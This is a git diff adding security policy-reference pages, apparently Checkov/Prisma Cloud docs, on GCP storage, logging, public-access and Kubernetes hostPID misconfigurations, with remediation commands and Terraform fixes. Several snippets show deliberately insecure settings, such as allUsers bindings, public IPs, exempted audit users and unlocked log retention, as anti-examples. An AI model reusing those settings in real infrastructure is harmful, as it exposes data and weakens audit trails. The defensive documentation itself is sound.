b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc new file mode 100644 index 000000000..8842d89fb --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc @@ -0,0 +1,105 @@ +== GCP Vertex AI instances are not private + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 60313d7a-ff41-40ed-8bf0-74087cc0be9e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py[CKV_GCP_89] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +*Vertex AI Workbench* is a data science service offered by GCP that leverages https://jupyterlab.readthedocs.io/en/stable/getting_started/overview.html[JupyterLab] to explore and access data. +Workbenches have public IPs assigned by default which can increase your attack surface and expose sensitive data. +We recommend you only assign private IPs to Vertex AI Workbenches. + +//// +=== Fix - Runtime + + +* GCP Console* + + +It's not currently possible to edit a * Vertex AI workbench* network setting to remove or add a public IP. +To create a * Vertex AI Workbench* with a private IP: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/vertex-ai/workbench/create-instance [Vertex AI Workbench]. + +. Scroll down to the _Networking_ section and expand. + +. Locate the _External IP_ dropdown and select * None*. + + +* CLI Command* + + +It's not currently possible to edit a * Vertex AI workbench* network settings to remove or add a public IP. +To create a private * Vertex AI Workbench* you'll need to specify the `--no-public-ip` command. +For example: + + +[source,shell] +---- +{ + "# To create an instance from a VmImage name +gcloud beta notebooks instances create example-instance \\ + --vm-image-project=deeplearning-platform-release \\ + --vm-image-name=tf2-2-1-cu101-notebooks-20200110 \\ + --machine-type=n1-standard-4 \\ + --location=us-central1-b \\ + --no-public-ip", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_notebooks_instance +* *Field:* no_public_ip + + +[source,go] +---- +{ + "resource "google_notebooks_instance" "public_instance" { + name = "my-notebook" + location = "us-west1-a" + machine_type = "e2-medium" + vm_image { + project = "deeplearning-platform-release" + image_family = "tf-latest-cpu" + +- no_public_ip = false ++ no_public_ip = true + } + +}", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..389b886c4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,134 @@ +== GCP Container Registry repositories are anonymously or publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 027a2049-cb36-4d7a-aea7-2a8e6e84aeae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml[CKV2_GCP_9] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +GCP Container Registry repositories are anonymously or publicly accessible +*GCP Container Registry repositories are anonymously or publicly accessible* + +_Google Container Registry (GCR)_ is a GCP service that contains repositories for your container images. +A GCR repo is publicly accessible if the host location's underlying storage bucket is publicly accessible because GCR images are stored in GCS. +Public GCR repositories can put your data at risk of exposure and should be adjusted to a more secure configuration (private). +We recommend you ensure that neither anonymous or public access to *GCR Repositories* is allowed. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To remove anonymous or public access to your GCR repositories: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/gcr/settings [GCR Settings]. + +. Under _Public access_ locate the repositories that say * PUBLIC* under the _Visibility_ column. + +. Select the dropdown and switch to * PRIVATE*. + + +* CLI Command* + + +To remove anonymous or public access to your GCR repositories use the `gsutil` command: + + +[source,shell] +---- +{ + "gsutil iam ch -d PRINCIPAL gs://BUCKET-NAME +", +} +---- +Replace * PRINCIPAL* with either _allUsers_ or _allAuthenticatedUsers_ depending on your Checkov alert. +Replace * BUCKET-NAME* with the GCS bucket where your images are stored. +The * BUCKET-NAME* can be determined by executing `gsutil ls` and your Container Registry bucket URL will be listed as `gs://artifacts.PROJECT-ID.appspot.com` or `gs://STORAGE-REGION.artifacts.PROJECT-ID.appspot.com`. +* PROJECT-ID* and * STORAGE-REGION* will be replaced with your GCP project ID or the region where your GCR repository is configured. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket_iam_binding +* *Field:* members +* *Resource:* google_storage_bucket_iam_member +* *Field:* member +Google Container Registry (GCR) does not have IAM-specific resources in Terraform. +Instead, GCR IAM is handled via GCS IAM resources as seen in the below examples. + + +[source,go] +---- +{ + "resource "google_storage_bucket_iam_binding" "gcr_public_binding" { + bucket = google_storage_bucket.default.name + role = "roles/storage.viewer" + + members = [ +- "allUsers", +- "allAuthenticatedUsers", + ] +}", + + +} +---- + + +[source,go] +---- +{ + "resource "google_artifact_registry_repository_iam_member" "public_member" { + provider = google-beta + location = google_artifact_registry_repository.my-repo.location + repository = google_artifact_registry_repository.my-repo.name + role = "roles/artifactregistry.writer" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +}", + + +} +---- + + +[source,go] +---- +{ + "resource "google_storage_bucket_iam_member" "gcr_public_member" { + bucket = google_storage_bucket.default.name + role = "roles/storage.viewer" + +- member = "allUsers" +- member = "allAuthenticatedUsers" +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc new file mode 100644 index 000000000..32991b0d1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc @@ -0,0 +1,69 @@ +== Google Cloud Public Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-public-1.adoc[GCP Storage buckets has public access to all authenticated users] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py[CKV_GCP_28] +|HIGH + + +|xref:bc-gcp-public-2.adoc[GCP VM instance with the external IP address] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py[CKV_GCP_40] +|MEDIUM + + +|xref:ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc[GCP Cloud Run services are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py[CKV_GCP_102] +|MEDIUM + + +|xref:ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc[GCP Artifact Registry repositories are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py[CKV_GCP_101] +|HIGH + + +|xref:ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc[GCP BigQuery Tables are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py[CKV_GCP_100] +|HIGH + + +|xref:ensure-gcp-cloud-dataflow-job-has-public-ips.adoc[GCP Dataflow jobs are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py[CKV_GCP_94] +|HIGH + + +|xref:ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc[GCP KMS crypto key is anonymously accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] +|HIGH + + +|xref:ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc[GCP Dataproc Clusters have public IPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py[CKV_GCP_103] +|HIGH + + +|xref:ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc[GCP Dataproc clusters are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py[CKV_GCP_98] +|HIGH + + +|xref:ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc[GCP Pub/Sub Topics are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py[CKV_GCP_99] +|MEDIUM + + +|xref:ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc[GCP Vertex AI instances are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py[CKV_GCP_89] +|HIGH + + +|xref:ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc[GCP Container Registry repositories are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml[CKV2_GCP_9] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc new file mode 100644 index 000000000..28d0c8a8a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc @@ -0,0 +1,76 @@ +== Google storage buckets are not encrypted + + +=== Description + + +Google Storage Buckets is a Google service to store unstructured data that can be accessed by a key. +By default, Google will encrypt and decrypt the data to and from disk using a managed encryption key. +Google cloud storage services encrypts data on the server side, before it is written to disk, at no additional charge. +We recommend you use opt-in server-side-encryption wherever available. + +//// +=== Fix - Runtime + + +* GCP Console Use customer-managed encryption keys to configure your Cloud Storage service account with permission to use your Cloud KMS key, using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to * Cloud Key Management Service Keys*. + +. Click on the name of the key ring that contains the desired key. + +. Select the key's checkbox. ++ +The * Permissions* tab in the right window pane becomes available. + +. In the * Add members* dialog, enter the email address of the Cloud Storage service account you are granting access to. + +. In the * Select a role* drop down, select * Cloud KMS CryptoKey Encrypter/Decrypter*. + +. Click * Add*. + + +* CLI Command* + + +Use the gsutil kms authorize command to give the service account associated with your bucket permission to encrypt and decrypt objects using your Cloud KMS key: + +---- +gsutil kms authorize +-p PROJECT_STORING_OBJECTS +-k KEY_RESOURCE +---- + +PROJECT_STORING_OBJECTS is the ID for the project containing the objects you want to encrypt or decrypt. +For example, my-pet-project. +KEY_RESOURCE is your Cloud KMS key resource. +For example, projects/my-pet-project/locations/us-east1/keyRings/my-key-ring/cryptoKeys/my-key. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket +* *Arguments:* encryption (Optional) The bucket's encryption configuration. +default_kms_key_name: A Cloud KMS key that will be used to encrypt objects inserted into this bucket, if no encryption method is specified. +You must pay attention to whether the crypto key is available in the location that this bucket is created in. + + +[source,go] +---- +{ + "resource "google_storage_bucket" "auto-expire" { + name = "auto-expiring-bucket" + location = "US" + force_destroy = true ++ encryption = default_kms_key_name", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc new file mode 100644 index 000000000..ed1cd9bc1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc @@ -0,0 +1,100 @@ +== GCP cloud storage bucket with uniform bucket-level access disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f0e09192-0716-11eb-adc1-0242ac120002 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py[CKV_GCP_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +For a user to access a Cloud Storage resource only one of the systems needs to grant the user permission. +Cloud IAM is used throughout Google Cloud and allows you to grant a variety of permissions at bucket and project levels. +ACLs have limited permission options, are used only by Cloud Storage, and allow you to grant permissions on a per-object basis. +Cloud Storage has uniform bucket-level access that supports a uniform permissions system. +Using this feature disables ACLs for all Cloud Storage resources. + +Access to Cloud Storage resources is granted exclusively through Cloud IAM. +Enabling uniform bucket-level access guarantees that if a Storage bucket is not publicly accessible, no object in the bucket is publicly accessible. + +We recommend you enable uniform bucket-level access on Cloud Storage buckets. +Uniform bucket-level access is used to unify and simplify how you grant access to your Cloud Storage resources. +Cloud Storage offers two systems that act in parallel for granting users permission to access your buckets and objects: + +* Cloud Identity and Access Management (Cloud IAM) +* Access Control Lists (ACLs). + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/storage/browser [Cloud Storage]. + +. From the * list of buckets*, select the name of the desired bucket. + +. Near the top of the page, click the * Permissions* tab. + +. In the text box that begins * This bucket uses fine-grained access control*, click * Edit*. + +. A pop-up menu opens. ++ +Select * Uniform*. + +. Click * Save*. + + +* CLI Command* + + +Set the option to on for uniformbucketlevelaccess, using the following command: `gsutil uniformbucketlevelaccess set on gs://BUCKET_NAME/` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket +* *Arguments:* uniform_bucket_level_access is set to true, + + +[source,go] +---- +{ + "resource "google_storage_bucket" "examplea" { + name = "terragoat-${var.environment}" + bucket_policy_only = true + + uniform_bucket_level_access = true +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc new file mode 100644 index 000000000..3cc12df04 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc @@ -0,0 +1,58 @@ +== GCP Storage Bucket does not have Access and Storage Logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aee21917-3cff-4004-b965-79fb52cff952 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py[CKV_GCP_62] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Some resources require a record of who access them and when. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket +* *Arguments:* logging/log_bucket to specify a Bucket to store access log in. + + +[source,go] +---- +{ + "resource "google_storage_bucket" "logging" { + name = "jgwloggingbucket" + location = var.location + uniform_bucket_level_access = true ++ logging { ++ log_bucket = "mylovelybucket" ++ } +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc new file mode 100644 index 000000000..7779da1f9 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc @@ -0,0 +1,59 @@ +== GCP storage bucket is logging to itself + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53dd2bfd-1b3c-4b7a-9eea-bad3c148cd15 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py[CKV_GCP_63] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A check to ensure that the specified logging bucket is not itself. +A bucket must not log access to itself, logging requires a second separate bucket. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket This check will trigger if you attempt to self reference: + + +[source,go] +---- +{ + "resource "google_storage_bucket" "mylovelybucket" { + name = "mylovelybucket" + location = var.location + uniform_bucket_level_access = true + logging { + log_bucket = "mylovelybucket" + } + +}", + "name": "google_storage_bucket.mylovelybucket,tf" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc new file mode 100644 index 000000000..1b8b4308d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc @@ -0,0 +1,24 @@ +== Google Cloud Storage Gcs Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-gcs-2.adoc[GCP cloud storage bucket with uniform bucket-level access disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py[CKV_GCP_29] +|MEDIUM + + +|xref:bc-gcp-logging-2.adoc[GCP Storage Bucket does not have Access and Storage Logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py[CKV_GCP_62] +|MEDIUM + + +|xref:bc-gcp-logging-3.adoc[GCP storage bucket is logging to itself] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py[CKV_GCP_63] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc new file mode 100644 index 000000000..13ebb9c9b --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc @@ -0,0 +1,105 @@ +== GCP VPC Flow logs for the subnet is set to Off + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3a83223b-821a-494b-8456-6dfc22fc58d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py[CKV_GCP_26] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Flow Logs capture information about IP traffic going to and from network interfaces. +This information can be used to detect anomalous traffic and insight about security workflows. +You can view and retrieve flow log data in Stackdriver Logging. +VPC networks and subnetworks provide logically isolated and secure network partitions to launch Google Cloud Platform (GCP) resources. +When Flow Logs are enabled for a subnet, VMs within that subnet report on all Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) flows. +Each VM samples the inbound and outbound TCP and UDP flows it sees, whether the flow is to or from another VM, a host in the on-premises datacenter, a Google service, or a host on the Internet. +If two GCP VMs are communicating and both are in subnets that have VPC Flow Logs enabled, both VMs report the flows. +We recommended you set *Flow Logs* to *On* to capture this data. +Because the volume of logs may be high, you may wish to enable flow logs only for business-critical VPC Network Subnets. +Flow Logs supports the following use cases: +* Network monitoring +* Understanding network usage and optimizing network traffic expenses +* Network forensics +* Real-time security analysis + +//// +=== Fix - Runtime + + +* GCP Console* + + + +. Open the VPC network GCP Console https://console.cloud.google.com/networking/networks/list. + +. Click the name of a subnet to display the * Subnet details* page. + +. Click the * EDIT* button. + +. Set * Flow Logs * to * On*. + +. Click * Save*. + + +* CLI Command* + + +To set Private Google access for a network subnet, run the following command: +---- +gcloud compute networks subnets update [SUBNET_NAME] +--region [REGION] +--enable-flow-logs +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_subnetwork +* *Arguments:* log_config + + +[source,go] +---- +{ + "resource "google_compute_subnetwork" "example" { + name = "log-test-subnetwork" + ip_cidr_range = "10.2.0.0/16" + region = "us-central1" + network = google_compute_network.custom-test.id + ++ log_config { + aggregation_interval = "INTERVAL_10_MIN" + flow_sampling = 0.5 + metadata = "INCLUDE_ALL_METADATA" + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc new file mode 100644 index 000000000..8f6064637 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc @@ -0,0 +1,122 @@ +== GCP Project audit logging is not configured properly across all services and all users in a project + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 237d9785-5d84-4b1d-9a46-d21f702648f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml[CKV2_GCP_5] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is recommended that Cloud Audit Logging is configured to track all admin activities and read, write access to user data. +Cloud Audit Logging maintains two audit logs for each project, folder, and organization: Admin Activity and Data Access. + +. Admin Activity logs contain log entries for API calls or other administrative actions that modify the configuration or metadata of resources. ++ +Admin Activity audit logs are enabled for all services and cannot be configured. + +. Data Access audit logs record API calls that create, modify, or read user-provided data. ++ +These are disabled by default and should be enabled. ++ +There are three kinds of Data Access audit log information: ++ +** Admin read: Records operations that read metadata or configuration information. ++ +Admin Activity audit logs record writes of metadata and configuration information that cannot be disabled. ++ +** Data read: Records operations that read user-provided data. ++ +o Data write: Records operations that write user-provided data. ++ +It is recommended to have an effective default audit config configured in such a way that: + +. logtype is set to DATA_READ (to log user activity tracking) and DATA_WRITES (to log changes/tampering to user data). + +. audit config is enabled for all the services supported by the Data Access audit logs feature. + +. Logs should be captured for all users, i.e., there are no exempted users in any of the audit config sections. ++ +This will ensure overriding the audit config will not contradict the requirement. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Arguments:* google_project_iam_audit_config + + +[source,go] +---- +{ + "resource "google_project" "good_project" { + name = "good" + project_id = "123456" +} + + +resource "google_project" "bad_project" { + name = "bad" + project_id = "123456" +} + + +resource "google_project_iam_audit_config" "project_good_audit" { + project = google_project.good_project.id ++ service = "allServices" + audit_log_config { + log_type = "ADMIN_READ" + } + + audit_log_config { + log_type = "DATA_READ" + } + + audit_log_config { + log_type = "DATA_WRITE" + } + +} + +resource "google_project_iam_audit_config" "project_bad_audit" { + project = google_project.bad_project.id +- service = "someService" + audit_log_config { + log_type = "ADMIN_READ" + } + + audit_log_config { + log_type = "DATA_READ" +- exempted_members = [ +- "user:joebloggs@hashicorp.com", +- ] + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc new file mode 100644 index 000000000..24c85ea3f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc @@ -0,0 +1,76 @@ +== GCP Log bucket retention policy is not configured using bucket lock + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14356227-d5c6-4151-b885-4f21437f820a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml[CKV2_GCP_4] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling retention policies on log buckets will protect logs stored in cloud storage buckets from being overwritten or accidentally deleted. +It is recommended to set up retention policies and configure Bucket Lock on all storage buckets that are used as log sinks. +Logs can be exported by creating one or more sinks that include a log filter and a destination. +As Stackdriver Logging receives new log entries, they are compared against each sink. +If a log entry matches a sink's filter, then a copy of the log entry is written to the destination. +Sinks can be configured to export logs in storage buckets. +It is recommended to configure a data retention policy for these cloud storage buckets and to lock the data retention policy; +thus permanently preventing the policy from being reduced or removed. +This way, if the system is ever compromised by an attacker or a malicious insider who wants to cover their tracks, the activity logs are definitely preserved for forensics and security investigations. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_logging_folder_sink / google_logging_project_sink / google_logging_organization_sink +* *Arguments:* google_storage_bucket + + +[source,go] +---- +{ + "resource "google_storage_bucket" "log_bucket_bad" { + name = "organization-logging-bucket" + + retention_policy { + retention_period = 604800 +- is_locked = false + } + +} + +resource "google_storage_bucket" "log_bucket_good" { + name = "organization-logging-bucket" + + retention_policy { + retention_period = 604800 ++ is_locked = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc new file mode 100644 index 000000000..738352dd7 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc @@ -0,0 +1,24 @@ +== Logging Policies 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-logging-1.adoc[GCP VPC Flow logs for the subnet is set to Off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py[CKV_GCP_26] +|MEDIUM + + +|xref:ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc[GCP Project audit logging is not configured properly across all services and all users in a project] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml[CKV2_GCP_5] +|MEDIUM + + +|xref:ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc[GCP Log bucket retention policy is not configured using bucket lock] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml[CKV2_GCP_4] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc new file mode 100644 index 000000000..517b9659c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc @@ -0,0 +1 @@ +== Kubernetes Policies diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc new file mode 100644 index 000000000..1970c2a8c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc @@ -0,0 +1,100 @@ +== Containers wishing to share host process ID namespace admitted +// Containers allowed to share host process ID namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53a5a44c-050a-432c-a0fb-ea655acf14a8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py[CKV_K8S_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When process namespace sharing is enabled, processes in a container are visible to all other containers in that pod. +This feature can enable configuring cooperating containers that do not include debugging tools, such as a logger sidecar container or troubleshooting container images. +Sharing the host process ID namespace breaks the isolation between container images and can make processes visible to other containers in the pod. +This includes all information in the */proc* directory, which can sometimes include passwords or keys, passed as environment variables. +We recommend you do not admit containers wishing to share the host process ID namespace. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostPID (Optional) When set to false, Pod are unable to use their host's PID namespace. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostPID: false +---- + +To use a **PodSecurityPolicy** resource the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git 